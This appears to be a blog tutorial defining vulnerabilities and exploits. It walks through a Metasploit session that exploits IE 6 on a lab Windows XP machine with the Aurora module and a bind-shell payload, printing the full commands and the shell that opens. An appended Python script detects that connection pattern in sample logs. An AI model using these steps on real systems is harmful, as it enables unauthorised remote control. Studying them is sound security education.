Yes, you heard it right!
This was done by Peter Vreugdenhil in pwn2own 2010 CanSecWest contest.
You may find the detailed report here.
Well, I just thought of doing a live demonstration to clear up some very basic terms, like a Vulnerability and an Exploit.
This can be a good start for those who are new to these terms.
A vulnerability is a loophole in a service.
An exploit is the penetration, i.e. doing something unusual (which that service is not supposed to do), by using the vulnerability.
As simple, as it sounds :)
In the general scenario, an exploit is divided into two parts: the vulnerability exposure and the payload.
The payload is a set of machine language instructions, in the form of opcodes, which interact with the processor and execute the code of the attacker's choice.
The live demonstration was about exploiting IE 6 on a Windows XP SP2 box with the Aurora exploit (which Google claims was used by Chinese hackers for the recent attacks on their servers in China). I used the Metasploit framework to develop the exploit more quickly, and set the parameters accordingly.
So, following are all the things I did while demonstrating it:
1. Started Metasploit using 'msfconsole' on my Ubuntu host
user@localhost:~$ msfconsole
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 537 exploits - 256 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8964 updated today (2010.03.31)
msf >
2. Searched for the 'aurora' string (as I knew that such a keyword exists)
msf > search -t exploit aurora
[*] Searching loaded modules for pattern 'aurora'...
Exploits
========
Name                             Rank    Description
----                             ----    -----------
windows/browser/ms10_002_aurora  normal  Internet Explorer "Aurora" Memory Corruption
msf >
3. Selected the module
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >
4. Showed the parameters to be set
msf exploit(ms10_002_aurora) > show options
Module options:
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)
Exploit target:
Id  Name
--  ----
0   Automatic
msf exploit(ms10_002_aurora) >
5. Set the server as my Ubuntu host, so I gave the IP of my 'vmnet8' adapter, as the XP guest was on NAT
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.188.1
SRVHOST => 192.168.188.1
6. Set URIPATH to "/" for convenience
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
7. And here comes the second part of the exploit, i.e. the payload. I set the payload to windows/shell/bind_tcp, which listens for a connection and spawns a piped command shell
msf exploit(ms10_002_aurora) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
8. Lastly, before exploiting the target machine, re-check the parameters
msf exploit(ms10_002_aurora) > show options
Module options:
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     192.168.188.1    yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH     /                no        The URI to use for this exploit (default is random)
Payload options (windows/shell/bind_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port
RHOST                      no        The target address
Exploit target:
Id  Name
--  ----
0   Automatic
msf exploit(ms10_002_aurora) >
9. Run the exploit
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.
10. Now open the URL on the victim's machine
11. In the console window, you can see that one session is opened
msf exploit(ms10_002_aurora) >
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.
[*] Started bind handler
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.188.138
[*] Started bind handler
[*] Command shell session 1 opened (192.168.188.1:54460 -> 192.168.188.138:4444)
12. Interacting with the session, by specifying the session number, will give you...
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
..............Done!!!
Phheewww......
OMG, I wrote that all? ;;)
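As an added example (not part of the original post), here is the same exchange seen from the defender's side: the console output above shows the victim pulling the page from 192.168.188.1:8080 and then the bind handler connecting from 192.168.188.1 to the victim on port 4444. The script below, run over constructed connection-log lines modelled on that exchange, flags the direction reversal a bind_tcp payload produces: a host makes an outbound web request to a peer, and shortly afterwards that same peer opens an inbound connection to the host on a non-web port. The log format, hosts and time window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log lines (not from the original post), modelled on the
# exchange shown above: the XP guest fetches the exploit page from the
# Metasploit host on 8080, then the bind handler dials the guest on 4444.
# The last two lines are the same shape but 11 minutes apart, so they are
# outside the correlation window and must not be flagged.
SAMPLE_LOG = """\
2010-03-31 10:00:01 192.168.188.138:1034 -> 192.168.188.1:8080 tcp allow
2010-03-31 10:00:02 192.168.188.138:1035 -> 192.168.188.10:445 tcp allow
2010-03-31 10:00:04 192.168.188.1:54460 -> 192.168.188.138:4444 tcp allow
2010-03-31 10:09:00 192.168.188.20:2001 -> 192.168.188.1:8080 tcp allow
2010-03-31 10:20:00 192.168.188.1:40000 -> 192.168.188.20:4444 tcp allow
"""

# Assumed log format: "<date> <time> <src>:<sport> -> <dst>:<dport> <proto> <action>"
LINE_RE = re.compile(r"^(\S+ \S+) (\S+):(\d+) -> (\S+):(\d+) (\w+) (\w+)$")
WEB_PORTS = {80, 443, 8080}

def parse(text):
    """Parse log lines into (time, src, sport, dst, dport) tuples; skip junk."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events.append((ts, m.group(2), int(m.group(3)), m.group(4), int(m.group(5))))
    return events

def find_bind_shell_pattern(events, window=timedelta(minutes=5)):
    """Flag an inbound connection from peer P to host H on a non-web port that
    follows, within `window`, an outbound web request from H to P.  That
    reversal of direction is the fingerprint of a bind_tcp payload: the victim
    pulled the page, then the serving host connected to the new listener."""
    hits = []
    web_fetches = [(ts, src, dst) for ts, src, _, dst, dport in events if dport in WEB_PORTS]
    for ts, src, sport, dst, dport in events:
        if dport in WEB_PORTS:
            continue
        for fts, victim, server in web_fetches:
            if victim == dst and server == src and timedelta(0) <= ts - fts <= window:
                hits.append((dst, dport, src, ts.strftime("%H:%M:%S")))
                break
    return hits

if __name__ == "__main__":
    for host, port, peer, when in find_bind_shell_pattern(parse(SAMPLE_LOG)):
        print(f"{when} possible bind shell: {peer} -> {host}:{port} after web fetch")
```

In practice the same correlation can be fed from firewall or NetFlow records, and a host suddenly accepting connections on a port it never listened on before is the other half of the signal.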